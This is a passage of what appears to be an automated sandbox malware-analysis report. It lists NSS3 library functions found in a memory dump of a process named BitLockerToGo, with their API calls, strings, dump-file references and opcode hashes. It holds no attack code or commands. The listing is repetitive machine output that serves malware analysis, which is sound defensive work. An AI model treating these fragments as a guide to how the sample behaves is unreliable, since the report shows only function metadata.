                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6606A0: PR_Unlock.NSS3 ref: 6C6606EB
                                                                                                                                                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,6C649B8A,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C6609D9
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C6609F2
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C660A1C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C660A30
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C649B8A,00000000,k-dl), ref: 6C660A48
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$Alloc_ArenaUtilmemcmp
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 115324291-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 941cfb958ebae50c210f293a759a6e0a448e1461d8265489af6bbc6d9c933645
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4cf15f7a689110fdf31624aeadf766efea49ddb6cef523b0d8fd501c92730aef
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 941cfb958ebae50c210f293a759a6e0a448e1461d8265489af6bbc6d9c933645
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3902F0B1E002059FEB008F66DC40BAB77B9EF49318F144139ED05A7B52E732E955CB9A
                                                                                                                                                                                                                                                                                                                                                          Function 6C6EC9E0 Relevance: 7.7, APIs: 5, Instructions: 187timeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_NormalizeTime.NSS3(00000000,?), ref: 6C6ECEA5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: NormalizeTime
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1467309002-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3925dcc75932ac9c57ca853eb47738748d3f4f383806342d8d4595d78d67988f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b0b74b4ba9ef43febaae36fd53cad4215432c3a59f9c69cbc567200dc126435d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3925dcc75932ac9c57ca853eb47738748d3f4f383806342d8d4595d78d67988f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD717371A097418FC704CF28C84062ABBE5FFC9314F258A2EE469CB7A1E730D956CB55
                                                                                                                                                                                                                                                                                                                                                          Function 6C75CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C75D086
                                                                                                                                                                                                                                                                                                                                                          • PR_Malloc.NSS3(00000001), ref: 6C75D0B9
                                                                                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C75D138
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 154ef9eb86cd4c7fb332ac2d35f451568b2b387a7f5359694ccf0c7225c5ae50
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9D18D22B416464BFB14487D8FA13EA779387663B4FD84339D1218BBE5EE19C863C345
                                                                                                                                                                                                                                                                                                                                                          Function 6C6FAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d31e19e0dc53ec2c1030c39c625c5bbf5219ffe5d0255a2729bbebce8c3119ee
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b39378a63a3b1dc45a01f1e14ade6d4fd95fa1acfad0a93f1b0c487d99e8b4d1
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d31e19e0dc53ec2c1030c39c625c5bbf5219ffe5d0255a2729bbebce8c3119ee
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39F1BC71F0121A8BEB04CF68D9407AE77F2BB8A308F258239D915D7B54EB749952CBC4
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C6B1052
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C6B1086
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                                                          • String ID: h(kl$h(kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1297977491-3810936736
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 14cab9ae6ea9fa6c5f7b6ad6fc8ddc5096aa70c859aac1340d4e2109dd1807a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 284c9cb2296010198357759461c09c7c66e8f2fc1a44f0e55898945d802025ad
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14cab9ae6ea9fa6c5f7b6ad6fc8ddc5096aa70c859aac1340d4e2109dd1807a4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86A14F71B0124A9FDF08CF99C994AEEBBB6BF88314B148129E905B7700DB35EC11CB94
                                                                                                                                                                                                                                                                                                                                                          Function 6C638EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f1742ba5916e2053bc99d5b71274bb3a2271c8b57548e4c7d8d81518e46fe557
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 52a03698498aee2705a1b02c81bede4665719e58c6521afd145190a111185dd0
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1742ba5916e2053bc99d5b71274bb3a2271c8b57548e4c7d8d81518e46fe557
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD11B672A002258BD704CF15D8847DAB7A5BF85358F14727BD409CFA61C775D886C7C5
                                                                                                                                                                                                                                                                                                                                                          Function 6C710C40 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cd39fe7b89f391f4d6cfb205fc3a3e27fb8579cf3b7a258f1255e9122008daf
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9b7a1b23010dd0c21f3ef7670b7fa68c1124e1b6eecc074492844d40a4e1a2f2
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cd39fe7b89f391f4d6cfb205fc3a3e27fb8579cf3b7a258f1255e9122008daf
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411BF747082099FCB00DF18C8806AA77B1FF85368F18817DD8198BB01DB32E816CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C710D60 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 63155c67300950c9a37be2557313113daeb2049564b783108ae76d764a15b742
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE0923A21A054A7DB148E09C556AA97359DF81619FBC807ECC9D9FE01D733F8138781
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C6A5E08
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C6A5E3F
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C6A5E5C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5E7E
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5E97
                                                                                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(secmod.db), ref: 6C6A5EA5
                                                                                                                                                                                                                                                                                                                                                          • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C6A5EBB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C6A5ECB
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C6A5EF0
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5F12
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C6A5F35
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C6A5F5B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5F82
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C6A5FA3
                                                                                                                                                                                                                                                                                                                                                          • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C6A5FB7
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6A5FC4
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5FDB
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6A5FE9
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A5FFE
                                                                                                                                                                                                                                                                                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6A600C
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A6027
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C6A605A
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C77AAF9,00000000), ref: 6C6A606A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A607C
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A609A
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6A60B2
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A60CE
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1427204090-154007103
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e963644eceecac89c9d6a1b3652e652621c3b315e3b93f551f2b52fb7ca64ac7
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a2ba538d20d98e84bdcbcfe2f298cec6feaa3362f95b94341e032e4f7635b7da
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e963644eceecac89c9d6a1b3652e652621c3b315e3b93f551f2b52fb7ca64ac7
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8091F9F09046055BEF11CFA59D45BAA3BA4AF0634CF080060ED5597B42E731DD57CBBA
                                                                                                                                                                                                                                                                                                                                                          Function 6C7509D0 Relevance: 61.5, APIs: 33, Strings: 2, Instructions: 275filetimethreadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C750A22
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C750A35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C633810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C63382A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C633810: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C633879
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C750A66
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C750A70
                                                                                                                                                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C750A9D
                                                                                                                                                                                                                                                                                                                                                          • PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C750AC8
                                                                                                                                                                                                                                                                                                                                                          • PR_vsmprintf.NSS3(?,?), ref: 6C750AE8
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C750B19
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(00000000), ref: 6C750B48
                                                                                                                                                                                                                                                                                                                                                          • OutputDebugStringA.KERNEL32(?), ref: 6C750B88
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C750C36
                                                                                                                                                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C750C45
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C750C5D
                                                                                                                                                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C750C76
                                                                                                                                                                                                                                                                                                                                                          • PR_LogFlush.NSS3 ref: 6C750C7E
                                                                                                                                                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C750C8D
